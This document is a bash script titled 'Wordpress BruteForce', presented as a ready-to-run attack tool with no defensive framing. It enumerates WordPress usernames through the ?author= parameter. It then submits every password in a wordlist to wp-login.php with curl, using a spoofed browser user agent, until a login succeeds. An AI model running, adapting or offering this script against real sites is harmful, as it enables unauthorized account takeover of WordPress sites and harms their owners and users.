Wordpress BruteForce

1. #! /bin/bash
2.  
3. USER_AGENT="Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:21.0) Gecko/20130331 Firefox/21.0"
4. TIMEOUT=1
5. COOKIE=cookie-`date +%s`
6. COOKIE_PATH="/tmp/$COOKIE"
7.  
8. # Help
9. help_man(){
10.     echo -e "Arguments:\n\t--url\t\twordpress url\n\t--user\t\twordpress username\n\t--wordlist\tpath to password wordlist\n"
11.     echo -e "User Enumeration:\n./wpbrute.sh --url=www.example.com\n\nPassword Bruteforce:\n./wpbrute.sh --url=www.example.com --user=admin --wordlist=wordlist.txt"
12. }
13.  
14.  
15. # Test wordpress url
16. test_url(){
17.     CHECK_URL=`curl -o /dev/null --silent --head --write-out '%{http_code}\n' $WP_URL/wp-login.php`
18.     if [ "$CHECK_URL" -ne 200 ]; then echo -e "Url error: $WP_URL\nHTTP CODE: $CHECK_URL"; exit; fi
19. }
20.  
21. # User Enumeration
22. user_enum(){
23.     echo "[+] Username or nickname enumeration"
24.     for i in {1..5}
25.     do
26.         curl -s -A "$USER_AGENT" -L -i $WP_URL/?author=$i | grep -E -o "\" title=\"View all posts by [a-sz0-9A-Z\-\.]*.*\" |Location:.*" | sed 's/\// /g' | grep -o "author .*" | sed 's/author //g' | sed 's/\"//g' | grep -v "^$"
27.     done
28.     exit
29. }
30.  
31. # ===================== START =====================
32.  
33. # Get arguments
34. args_array=( $@ )
35. len_args=${#args_array[@]}
36.  
37. # Check arguments
38. if [ "$len_args" -eq 1 ]; then
39.     WP_URL=`echo $@ | grep -o "\-\-url=.*" | cut -d\= -f2 | cut -d" " -f1`
40.     test_url
41.     user_enum
42. fi
43.  
44. if [ "$len_args" -ne 3 ]; then
45.     help_man
46.     exit
47. else
48.     # Get value
49.     WP_ADMIN=`echo $@ | grep -o "\-\-user=.*" | cut -d\= -f2 | cut -d" " -f1`
50.     WP_PASSWORD=`echo $@ | grep -o "\-\-wordlist=.*" | cut -d\= -f2 | cut -d" " -f1`
51.     if [ ! -f "$WP_PASSWORD" ]; then echo "Wordlist not found: $WP_PASSWORD"; exit; fi
52.     WP_URL=`echo $@ | grep -o "\-\-url=.*" | cut -d\= -f2 | cut -d" " -f1`
53.     test_url
54. fi
55.  
56. # Get cookie
57. curl -s -A "$USER_AGENT" -c "$COOKIE_PATH" $WP_URL/wp-login.php > /dev/null
58.  
59. # Bruteforce
60. echo "[+] Bruteforcing user [$WP_ADMIN]"
61. cat "$WP_PASSWORD" | while read line;
62.     do {
63.         echo $line
64.         REQ=`curl -s -b "$COOKIE_PATH" -A "$USER_AGENT" --connect-timeout $TIMEOUT -d log="$WP_ADMIN" -d pwd="$line" -d wp-submit="Log In" -d redirect_to="$WP_URL/wp-admin" -d testcookie=1 $WP_URL/wp-login.php`
65.  
66.         if [ "$REQ" == "" ]; then echo "The password is: $line"; rm "$COOKIE_PATH"; exit; fi
67.     }
68.     done
69.  
70. # Remove cookie
71. rm "$COOKIE_PATH" 2> /dev/null